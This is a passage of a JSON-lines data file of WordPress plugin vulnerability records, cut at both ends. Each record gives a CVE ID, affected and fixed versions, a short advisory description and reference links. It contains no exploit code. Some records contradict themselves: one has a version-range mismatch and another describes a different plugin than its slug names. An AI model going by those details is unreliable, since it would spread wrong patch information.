version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242743\\\/ultimate-member\\\/tags\\\/2.10.0\\\/includes\\\/core\\\/class-uploader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242743\\\/ultimate-member\\\/tags\\\/2.10.0\\\/includes\\\/core\\\/class-uploader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846f9828-2f1f-4d08-abfb-909b8d634d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846f9828-2f1f-4d08-abfb-909b8d634d8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12315","slug":"wp-ultimate-exporter","versionImpact":"2.9.3","versionEndExcluding":"2.10","description":"The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.3 via the exports directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/smack_uci_uploads\/exports\/ directory which can contain information like exported user data.","recommendation":"Update to version 2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L1678\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L1678\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230400%40wp-ultimate-exporter&new=3230400%40wp-ultimate-exporter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230400%40wp-ultimate-exporter&new=3230400%40wp-ultimate-exporter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/075709e0-5f00-4d7b-80f6-96e3b4b4a895?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/075709e0-5f00-4d7b-80f6-96e3b4b4a895?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13644","slug":"dethemekit-for-elementor","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's De Gallery widget in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ac720a-db1e-4aca-b12c-5289fa7b8b9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ac720a-db1e-4aca-b12c-5289fa7b8b9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22713","slug":"wpdm-gutenberg-blocks","versionEndExcluding":"2.1.9","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in WordPress Download Manager Gutenberg Blocks by WordPress Download Manager plugin <=\u00a02.1.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpdm-gutenberg-blocks\\\/wordpress-gutenberg-blocks-by-wordpress-download-manager-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpdm-gutenberg-blocks\\\/wordpress-gutenberg-blocks-by-wordpress-download-manager-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0661","slug":"dethemekit-for-elementor","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.36 via the duplicate_post() function due to insufficient restrictions on which posts can be duplicated. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, draft, or scheduled posts that they should not have access to by duplicating the post.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/admin\\\/includes\\\/dep\\\/admin-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236114\\\/dethemekit-for-elementor\\\/trunk\\\/admin\\\/includes\\\/dep\\\/admin-helper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2c937c-1ff8-4bcc-913b-83bade37d754?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2c937c-1ff8-4bcc-913b-83bade37d754?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11143","slug":"chatbot-chatgpt","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.8. This is due to missing or incorrect nonce validation on the update_assistant, add_new_assistant, and delete_assistant functions. This makes it possible for unauthenticated attackers to modify assistants via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f16b11b0-11df-4fb7-a6af-123f6c09d791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f16b11b0-11df-4fb7-a6af-123f6c09d791?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185255\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185255\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12818","slug":"wp-smart-tv","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The WP Smart TV plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tv-video-player' shortcode in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222468%40wp-smart-tv&new=3222468%40wp-smart-tv&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222468%40wp-smart-tv&new=3222468%40wp-smart-tv&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1d7cf90-1a9f-4d88-9dfb-f48481095a0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1d7cf90-1a9f-4d88-9dfb-f48481095a0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2309","slug":"wpforo","versionEndExcluding":"2.1.9","description":"The wpForo Forum WordPress plugin before 2.1.9 does not escape some request parameters while in debug mode, leading to a Reflected Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6161","slug":"wp-crowdfunding","versionImpact":"2.1.8","versionEndExcluding":"2.1.9","description":"The WP Crowdfunding WordPress plugin before 2.1.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca7b6a39-a910-4b4f-b9cc-be444ec44942\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca7b6a39-a910-4b4f-b9cc-be444ec44942\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10890","slug":"wpadverts","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WPAdverts \u2013 Classifieds Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadverts\\\/tags\\\/2.1.7\\\/includes\\\/shortcodes.php#L545\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadverts\\\/tags\\\/2.1.7\\\/includes\\\/shortcodes.php#L545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192192\\\/wpadverts\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192192\\\/wpadverts\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/592ee7b9-7016-4df3-9218-6f7aebf80503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/592ee7b9-7016-4df3-9218-6f7aebf80503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3228","slug":"kiwi-social-share","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Social Sharing Plugin \u2013 Kiwi plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.7 via the 'kiwi-nw-pinterest' class. This makes it possible for unauthenticated attackers to view limited content from password protected posts.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/896a038f-fe54-4120-842e-093ef236a898?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/896a038f-fe54-4120-842e-093ef236a898?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3109786%40kiwi-social-share&new=3109786%40kiwi-social-share&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3109786%40kiwi-social-share&new=3109786%40kiwi-social-share&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25146","slug":"delucks-seo","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The DELUCKS SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the saveSettings() function that had no capability checks in versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever a victim accesses the page.","refs":"[{\"url\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2019\\\/09\\\/21\\\/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-delucks-seo\\\/\",\"name\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2019\\\/09\\\/21\\\/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-delucks-seo\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2161211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2161211\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaa2f738-4764-467c-9544-889ca8ba73d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaa2f738-4764-467c-9544-889ca8ba73d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-delucks-seo-cross-site-scripting-2-1-7\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-delucks-seo-cross-site-scripting-2-1-7\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5757","slug":"wp-crowdfunding","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WP Crowdfunding WordPress plugin before 2.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adc5995-03a9-4860-b00b-7f8d7fe18058\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adc5995-03a9-4860-b00b-7f8d7fe18058\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12266","slug":"elex-woocommerce-dynamic-pricing-and-discounts","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The ELEX WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the elex_dp_export_rules() and elex_dp_import_rules() functions in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to import and export product rules along with obtaining phpinfo() data","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-exporter.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-exporter.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-importer.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elex-woocommerce-dynamic-pricing-and-discounts\\\/tags\\\/2.1.7\\\/admin\\\/elex-importer.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&new=3211131%40elex-woocommerce-dynamic-pricing-and-discounts&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063d452b-2a35-40aa-a002-ea55da778222?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063d452b-2a35-40aa-a002-ea55da778222?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2249","slug":"wpforo","versionEndExcluding":"2.1.8","description":"The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.7\\\/classes\\\/Actions.php#L444\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.7\\\/classes\\\/Actions.php#L444\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/800fa098-b29f-4979-b7bd-b1186a4dafcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/800fa098-b29f-4979-b7bd-b1186a4dafcb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.8\\\/classes\\\/Actions.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.1.8\\\/classes\\\/Actions.php#L437\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4670","slug":"pdfjs-viewer-shortcode","versionEndExcluding":"2.1.8","description":"The PDF.js Viewer WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a67c290-2a27-44fe-95ae-2d427e9d7548\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a67c290-2a27-44fe-95ae-2d427e9d7548\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10684","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dir' parameter in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6fcd334-4d9a-4c11-ab11-b96cdda698c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6fcd334-4d9a-4c11-ab11-b96cdda698c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/settings\\\/chatbot-settings-support.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/settings\\\/chatbot-settings-support.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10531","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to update GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc083470-3b43-42f3-8979-7fa6cce6ee75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc083470-3b43-42f3-8979-7fa6cce6ee75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10530","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the add_new_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to create new GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4fd7e76-4d8b-4e4d-9ae9-c7f9933f8324?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4fd7e76-4d8b-4e4d-9ae9-c7f9933f8324?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L596\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L596\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10529","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6b302c9-a6b9-4a91-acb5-2ad270817606?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6b302c9-a6b9-4a91-acb5-2ad270817606?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4289","slug":"shortcode-gallery-for-matterport-showcase","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WP Matterport Shortcode WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38c337c6-048f-4009-aef8-29c18afa6fdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38c337c6-048f-4009-aef8-29c18afa6fdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51406","slug":"fastdup","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ninja Team FastDup \u2013 Fastest WordPress Migration & Duplicator.This issue affects FastDup \u2013 Fastest WordPress Migration & Duplicator: from n\/a through 2.1.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fastdup\\\/wordpress-fastdup-plugin-2-1-7-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fastdup\\\/wordpress-fastdup-plugin-2-1-7-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4599","slug":"email-encoder-bundle","versionEndExcluding":"2.1.8","description":"The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eeb_mailto' shortcode in versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 